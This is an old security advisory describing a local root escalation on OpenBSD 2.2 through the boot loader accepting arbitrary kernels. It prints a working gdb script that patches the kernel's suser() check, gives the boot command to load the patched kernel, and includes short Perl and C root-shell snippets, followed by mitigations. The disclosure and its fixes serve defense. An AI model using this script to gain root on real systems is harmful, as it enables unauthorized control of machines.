obsd boot hack (boot-modified-kernel-attack)


    OpenBSD 2.2 (GENERIC#10)


    Peter Shipley found following.  It is possible to get root  access
    on a  OpenBSD system  from console  with out  password, floppy  or
    single user  boot access.   OpenBSD's boot  loader will  load  any
    kernel  in  the  UFS  file  system  this  allowing  the loading of
    compromised kernels (aka: boot-modified-kernel-attack).  In short,
    BIOS boot and console restrictions are not enough.

    While  it  is  known  that  super  user  access is achievable from
    console by booting  an "install" or  "fixit" floppy.   This can be
    inhibited by  removing the  floppy drive  and/or disabling  floppy
    boot in the BIOS.   Another method of achieving super  user access
    is by booting the system  in "single user mode" (with  kernel boot
    option "-s").  Again, this can be inhibited by marking/setting the
    console as an insecure terminal.   Thus requiring a root  password
    to boot in single user mode and thus blocking direct root login in
    multi-user mode.

    The  script  below  copies  the  /bsd  kernel to /var/tmp and then
    patches  the  copied  kernel  so  the  internel "suser()" function
    always return zero (0).  By inserting the following assembly code:

	xorl   %eax,%eax

    This is equivalent to the code stub:

	int suser() {

    The suser() is used  by the kernel to  test if the "calling"  user
    has  super-user  authority  or  not.   A  return value of zero (0)
    indicates the the calling user  is super-user any other value  (in
    this case  EPERM) indicates  a false/not-permitted  value.   After
    the patch  and kernel  reload (reboot)  all users  have super user
    privilege.  Script follows (


    # copyright 1998
    # Written by Peter Shipley
    # Mon Apr 13 02:20:29 PDT 1998

    # you can use this as long as you do not sell or charge for it's use.

    # developed on:
    #       OpenBSD crash 2.2 GENERIC#10 i386
    #       CPU 486DX2/66 w/  16MRam

    # this hack assumes  /var/tmp is on the same files system as /
    # if not you can still do this but it will take a few extra boot options

    # this inserts the following asm into suser
    #   xorl   %eax,%eax
    #   leave
    #   ret
    # with makes suser equivalent to
    #       int suser() {
    #          return(0);
    #       }
    # which will grant all users super-user privilege

    /bin/cp /bsd /var/tmp/bsd

    cat << 'EEOOFF' > /var/tmp/patch.gdb
    set write on
    exec-file bsd
    file bsd
    #disas suser
    #print  suser
    set $rf = suser+6
    set {char} $rf = 0x31
    set $rf = $rf + 1
    set {char} $rf = 0xc0
    set $rf = $rf + 1
    set {char} $rf = 0xc9
    set $rf = $rf + 1
    set {char} $rf = 0xc3
    disas suser

    /usr/bin/gdb --batch --command=/var/tmp/patch.gdb

    echo ""
    echo ""

    echo "ok now puch <reset> and  and at the boot> prompt type:
    echo "  boot> boot /var/tmp/bsd"

    echo "when the system finished booting you can gain root with"
    echo "a simple C or perl program"

    echo ""
    echo ""

    # #!/usr/bin/perl
    # $> = 0;
    # $) = 0;
    # exec "/bin/sh", "-i";
    # die "$!";

    exit 0

    Script for rootshell:

    /* cheap setuid code */
    char *shell = "/bin/csh";

	    execl(shell, shell, (char *)0);

    According to Theo de Raadt, ome don't even need such a complicated
    kernel modification program to do this:

        boot -d

    Voila, you are  in the kernel  debugger.  Or,  alternatively, make
    your own root filesystem and do:

        boot -a
        root device? fd0a


    It  should  be  noted  that  anyone  with  hardware  access  and a
    screwdriver can trivaly install a replacment HD and compromise the
    system  by  mounting  the  other  (original  drive)  thus physical
    security is always an issue.

    In very  short term,  fix is  to make  the kernel  /bsd not  world
    readable and owned by the group kmem:

        root# chmod 440 /bsd ; chgrp kmem /bsd

    and create the file /etc/boot.conf and add a line

        boot bsd

    This will cause the system  to automaticly boot and load  the /bsd
    kernel with out issueing the user the option to load a alternitive
    kernel.  Note that this can make it diffucult to repair a  damaged
    system should the /bsd kernel become corrupted.

    Long term fix the  only real fix is  to modify /boot to  only load
    kernels from the root directory and only load if owned by root and
    not world  readable.   (note the  latter is  supported in the boot
    source code as a unused compile time option) ref:


    there is a patch to hardcode the boot path for NetBSD/i386-1.3.1.